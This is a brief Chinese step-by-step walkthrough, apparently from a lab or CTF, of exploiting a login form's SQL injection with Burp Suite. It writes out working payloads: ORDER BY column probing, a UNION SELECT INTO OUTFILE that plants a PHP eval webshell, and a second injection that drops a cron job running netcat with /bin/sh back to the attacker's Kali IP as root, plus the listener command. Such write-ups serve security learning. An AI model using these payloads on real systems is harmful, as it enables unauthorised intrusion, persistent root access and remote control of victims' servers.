启动burpsuite监听网页
在监听到的页面右键点击Send to Repeater
然后跳转到Repeater
在输入框输入【 ‘ 】
测试是否存在注入点
对username,password进行一个个试。如果存在会返回界面会不一样。
当我们找到注入点
可以进行字符串猜解长度
‘order by 4# 报错
‘order by 3#页面正常
有3个字段
‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/www/888.php”#
写一句话木马(基本操作)
得到webshell
Whereis nc查找nc路径
whereis 查看命令路径
查看nc命令的绝对路径
返回/usr/bin/nc.traditional
设定定时任务反弹shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
解析* * * * *分别对应 分 时 日 月 周
开启监听在这里插入代码片
nc -nlvp 监听端口